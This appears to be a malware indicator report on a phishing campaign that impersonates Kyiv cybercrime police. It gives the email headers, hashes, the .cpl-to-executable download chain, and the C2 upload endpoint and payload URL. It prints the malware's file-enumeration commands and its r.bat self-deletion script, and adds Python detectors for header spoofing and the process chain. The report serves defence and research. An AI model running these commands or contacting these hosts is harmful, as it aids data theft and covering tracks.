- #IOC #OptiData #VR #Autoit #DLL #TA471 #uploader
- https://pastebin.com/rYsMt3vH
- previous_contact:
- 24/07/21 https://pastebin.com/qHHUgBNK
- 12/04/21 https://pastebin.com/yBpP4PPw
- FAQ:
- https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_083
- attack_vector
- --------------
- email > attach .rar > pdf.cpl (DLL) > GET stun.site/zepok101.exe > Users\Public\svchosts.exe > exfil to 185.244.41.109
- email_headers
- --------------
- List-Id: <tobnosimey.outlook.com>
- From: Управління протидії кіберзлочинам в місті Києві <police387@npu.gov.ua> <tobnosimey@outlook.com> [display name "Cybercrime Counteraction Department in the City of Kyiv <police387@npu.gov.ua>" imitates a National Police of Ukraine address; the real mailbox is tobnosimey@outlook.com, matching Return-Path]
- Subject: re: Повідомлення про підозру у порушенні закону [Notice of suspicion of a violation of the law]
- Date: Fri, 17 Dec 2021 16:10:00 +0300
- Return-Path: tobnosimey@outlook.com
- X-OriginatorOrg: outlook.com
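The From: header above is the lure: the address the victim sees (police387@npu.gov.ua) lives in the display name, while the mailbox that actually sent the mail is the outlook.com one. The following is an added example (not code from this paste) that splits a From: header the way an MTA does and flags an address embedded in the display name that differs from the real mailbox, plus a Return-Path domain mismatch. The sample header values are copied from the header block above; it assumes the raw message carried the display name in double quotes, which the paste dropped.

```python
"""Flag display-name address spoofing in a From: header.

Added example for this paste (not code from the original). SAMPLE_FROM and
SAMPLE_RETURN_PATH are copied from the header block above; the raw message
most likely carried the display name in double quotes, which the paste
dropped (assumption, handled by stripping the quotes).
"""
import re

SAMPLE_FROM = ('Управління протидії кіберзлочинам в місті Києві '
               '<police387@npu.gov.ua> <tobnosimey@outlook.com>')
SAMPLE_RETURN_PATH = 'tobnosimey@outlook.com'

_ADDR = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+')
_ANGLE = re.compile(r'<\s*([^<>\s]+@[^<>\s]+)\s*>')


def split_from(header):
    """Return (display_name, mailbox).

    Per RFC 5322 the mailbox is the last <...> pair; everything before it
    is display text, even when that text looks like an address.
    """
    angles = list(_ANGLE.finditer(header))
    if not angles:                      # bare addr-spec form, no display name
        m = _ADDR.search(header)
        return '', (m.group(0).lower() if m else '')
    last = angles[-1]
    name = header[:last.start()].strip().strip('"').strip()
    return name, last.group(1).lower()


def _domain(addr):
    return addr.rsplit('@', 1)[-1].lower() if '@' in addr else ''


def analyse_from(header, return_path=None):
    """Return a list of findings; an empty list means nothing suspicious."""
    name, mailbox = split_from(header)
    findings = []
    # An address written into the display name is what the victim sees;
    # it only matters when it differs from the mailbox that will get replies.
    for lure in (a.lower() for a in _ADDR.findall(name)):
        if lure != mailbox:
            findings.append(
                f'display name shows {lure} ({_domain(lure)}) '
                f'but mailbox is {mailbox} ({_domain(mailbox)})')
    if return_path:
        rp = return_path.strip().strip('<>')
        if _domain(rp) != _domain(mailbox):
            findings.append(
                f'Return-Path {rp} is not in mailbox domain {_domain(mailbox)}')
    return findings


if __name__ == '__main__':
    for finding in analyse_from(SAMPLE_FROM, SAMPLE_RETURN_PATH):
        print('SUSPICIOUS:', finding)
```

On the paste's header this yields exactly one finding (the npu.gov.ua address in the display name versus the outlook.com mailbox); Return-Path and mailbox agree, which is typical for this style of lure, so a Return-Path check alone would have passed it.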
- files
- --------------
- SHA-256 ef6f02c41b4bad58fc1930d0ed00a5db1e122b89bc2782ba4dbdc785bc07dba0
- File name pdf - Приклад заповнення пояснювальної текст заповнюється вручну.rar [ RAR archive data ] (filename translates to "pdf - Example of filling in an explanatory note, text is filled in manually.rar")
- File size 10.87 KB (11130 bytes)
- SHA-256 a318fbaddaa11df5edde620b4c45ff31316dcfadf085d0f862004c857be568d7
- File name pdf - Приклад заповнення пояснювальної текст заповнюється вручну.cpl [ Win32 DLL ] (same name as the archive, with a .cpl extension so that opening it runs the DLL through control.exe)
- File size 10.50 KB (10752 bytes)
- SHA-256 7e1355e51eb9c38e006368de1ae80b268ffab6918237696474f50802e3d8a9c8
- File name zepok101.exe (svchosts.exe) [ PE32 executable for MS Windows (GUI) Intel 80386 32-bit ASProtect v1.23 RC1 ]
- File size 2.52 MB (2641264 bytes)
- SHA-256 6f3994ad6b418b55ba2a3cd4f4d8cff35284a5790ea3dd38f1abf8699410430a
- File name zepok101_unpack.bin [ PE32 executable for MS Windows (GUI) Intel 80386 32-bit ]
- File size 4.93 MB (5169152 bytes)
- activity
- **************
- PL_SCR https://stun.site/zepok101.exe ( 37.9.13.206:443 )
- C2 185.244.41.109:8080/upld/
- Anti-VM
- **************
- + Detects Sandboxie through the presence of a library
- + Checks the BIOS version, most likely for anti-virtualization [\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion]
- + Detects VirtualBox through the presence of a registry key [ HKLM\HARDWARE\ACPI\DSDT\VBOX__ ]
- netwrk
- --------------
- 185.244.41.109:8080 POST /upld/AC38D1C7 HTTP/1.1 (Content-Type: application/upload) User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) (the default User-Agent of the WinHttp.WinHttpRequest COM object, i.e. the uploader does not bother to set its own)
- comp
- --------------
- rundll32.exe 2672 TCP 37.9.13.206 443 ESTABLISHED
- svchosts.exe 2720 TCP 185.244.41.109 8080 ESTABLISHED
- proc
- --------------
- "C:\Windows\System32\control.exe" "C:\Users\operator\Desktop\pdf_DLL.cpl",
- "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\operator\Desktop\pdf_DLL.cpl",
- C:\Users\Public\svchosts.exe
- C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.csv" /S /B /A
- C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.doc" /S /B /A
- C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.pdf" /S /B /A
- ...
- C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.7z" /S /B /A
- C:\Windows\system32\cmd.exe cmd /c start /min r.bat
- C:\Windows\system32\cmd.exe /K r.bat
- C:\Windows\SysWOW64\cmd.exe /min /c del "C:\Users\Public\r.bat"
- C:\Windows\SysWOW64\taskkill.exe /IM cmd.exe /F
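The proc block above is a complete chain: control.exe hands the .cpl to rundll32 Shell32.dll,Control_RunDLL, the DLL drops and runs svchosts.exe from C:\Users\Public, that process sweeps the user profile with one cmd /U /C DIR ... /S /B /A per extension, and finally r.bat is deleted and every cmd.exe is killed. The following is an added example (not code from this paste) that encodes those five behaviours as rules over process-creation events. EVENTS is constructed from the command lines above; pids 2672 and 2720 are taken from the comp section, while the remaining pids, parent links and timestamps are assumptions for the demo.

```python
"""Host-side detection for the execution chain in the proc section above.

Added example, not code from the original paste. EVENTS is a constructed
list of process-creation records (Sysmon event 1 style fields: t, pid,
ppid, image, cmdline) built from the command lines in this paste; pids
2672 and 2720 come from the comp section, the other pids, parent links
and timestamps are assumptions for the demo.
"""
import re
from collections import defaultdict

EVENTS = [
    dict(t=0, pid=2600, ppid=1000, image=r'C:\Windows\System32\control.exe',
         cmdline=r'"C:\Windows\System32\control.exe" "C:\Users\operator\Desktop\pdf_DLL.cpl",'),
    dict(t=1, pid=2672, ppid=2600, image=r'C:\Windows\system32\rundll32.exe',
         cmdline=r'"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL '
                 r'"C:\Users\operator\Desktop\pdf_DLL.cpl",'),
    dict(t=5, pid=2720, ppid=2672, image=r'C:\Users\Public\svchosts.exe',
         cmdline=r'C:\Users\Public\svchosts.exe'),
] + [
    dict(t=6 + i, pid=2800 + i, ppid=2720, image=r'C:\Windows\system32\cmd.exe',
         cmdline=rf'C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.{ext}" /S /B /A')
    for i, ext in enumerate(['csv', 'doc', 'pdf', 'xls', '7z'])
] + [
    dict(t=20, pid=2900, ppid=2720, image=r'C:\Windows\system32\cmd.exe',
         cmdline=r'C:\Windows\system32\cmd.exe cmd /c start /min r.bat'),
    dict(t=21, pid=2910, ppid=2900, image=r'C:\Windows\SysWOW64\cmd.exe',
         cmdline=r'C:\Windows\SysWOW64\cmd.exe /min /c del "C:\Users\Public\r.bat"'),
    dict(t=22, pid=2920, ppid=2910, image=r'C:\Windows\SysWOW64\taskkill.exe',
         cmdline=r'C:\Windows\SysWOW64\taskkill.exe /IM cmd.exe /F'),
]

USER_PATH    = re.compile(r'^[A-Z]:\\Users\\', re.I)
USERS_PUBLIC = re.compile(r'^[A-Z]:\\Users\\Public\\', re.I)
CPL_ARG      = re.compile(r'([A-Z]:\\[^"]+\.cpl)', re.I)
DIR_ENUM     = re.compile(r'\bDIR\s+"[^"]*\*\.\w+"\s+/S\s+/B\s+/A', re.I)
BAT_DELETE   = re.compile(r'\bdel\s+"?([A-Z]:\\Users\\Public\\[^"]+\.bat)', re.I)
KILL_CMD     = re.compile(r'/IM\s+cmd\.exe', re.I)


def _basename(image):
    return image.rsplit('\\', 1)[-1].lower()


def detect(events, enum_threshold=3, enum_window=30):
    """Return (rule, pid, detail) tuples for the behaviours in this paste."""
    hits = []
    by_pid = {e['pid']: e for e in events}
    dir_times = defaultdict(list)            # parent pid -> times of DIR sweeps
    for e in events:
        base, cmd = _basename(e['image']), e['cmdline']
        # 1. control.exe / rundll32 Control_RunDLL loading a .cpl from a user-writable path
        m = CPL_ARG.search(cmd)
        if base in ('control.exe', 'rundll32.exe') and m and USER_PATH.match(m.group(1)):
            hits.append(('cpl_from_user_path', e['pid'], m.group(1)))
        # 2. anything executing out of C:\Users\Public
        if USERS_PUBLIC.match(e['image']):
            hits.append(('exec_from_users_public', e['pid'], e['image']))
        # 3. recursive DIR /S /B /A sweeps by extension, counted per parent process
        if base == 'cmd.exe' and DIR_ENUM.search(cmd):
            dir_times[e['ppid']].append(e['t'])
        # 4. a batch file in Users\Public being deleted by cmd
        m = BAT_DELETE.search(cmd)
        if base == 'cmd.exe' and m:
            hits.append(('bat_cleanup_in_users_public', e['pid'], m.group(1)))
        # 5. taskkill /IM cmd.exe whose parent is the cmd that just ran a del
        if base == 'taskkill.exe' and KILL_CMD.search(cmd):
            parent = by_pid.get(e['ppid'])
            if parent and re.search(r'\bdel\b', parent['cmdline'], re.I):
                hits.append(('taskkill_cmd_after_delete', e['pid'], cmd))
    # Rule 3 fires once per parent when enough sweeps land inside the window.
    for ppid, times in dir_times.items():
        times.sort()
        for i in range(len(times) - enum_threshold + 1):
            if times[i + enum_threshold - 1] - times[i] <= enum_window:
                parent = by_pid.get(ppid)
                hits.append(('file_enum_burst', ppid, parent['image'] if parent else '?'))
                break
    return hits


if __name__ == '__main__':
    for rule, pid, detail in detect(EVENTS):
        print(f'{rule:28} pid={pid} {detail}')
```

Rules 1 and 2 are the cheapest to deploy and catch this sample before any exfiltration; rule 3 (the DIR burst) is the one to tune, since the threshold and window depend on how noisy legitimate scripts are in the environment.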
- persist
- --------------
- n/a
- drop
- --------------
- C:\Users\Public\svchosts.exe
- C:\Users\Public\r.bat
- r.bat
- --------------
- @echo off
- REM Retry the delete until svchosts.exe is gone: the file stays locked while the process is still exiting.
- :tryrem
- del svchosts.exe
- if exist svchosts.exe (goto tryrem)
- REM Detached cmd deletes this script (%~f0), then every cmd.exe is killed so no console window survives.
- start /b "" cmd /min /c del "%~f0"& Taskkill /IM cmd.exe /F&exit /b
- Files details
- --------------
- RAR https://www.virustotal.com/gui/file/ef6f02c41b4bad58fc1930d0ed00a5db1e122b89bc2782ba4dbdc785bc07dba0/details
- DLL https://www.virustotal.com/gui/file/a318fbaddaa11df5edde620b4c45ff31316dcfadf085d0f862004c857be568d7/details
- EXE https://www.virustotal.com/gui/file/7e1355e51eb9c38e006368de1ae80b268ffab6918237696474f50802e3d8a9c8/details
- EXE_unp https://www.virustotal.com/gui/file/6f3994ad6b418b55ba2a3cd4f4d8cff35284a5790ea3dd38f1abf8699410430a/details
- DLL https://www.unpac.me/results/89a184de-0712-4673-8238-f9ecd86c7362
- EXE https://www.unpac.me/results/40da648c-cf5e-4d13-ad39-5a42b087d945
- DLL https://analyze.intezer.com/analyses/159836bf-8ed5-4b6c-8ffa-e3c28f51f181
- EXE https://analyze.intezer.com/analyses/35f76754-f612-4306-924b-3f47cb862e83
- EXE_unp https://analyze.intezer.com/analyses/985987ff-81cb-4a88-b4a7-413f793c6744
- VR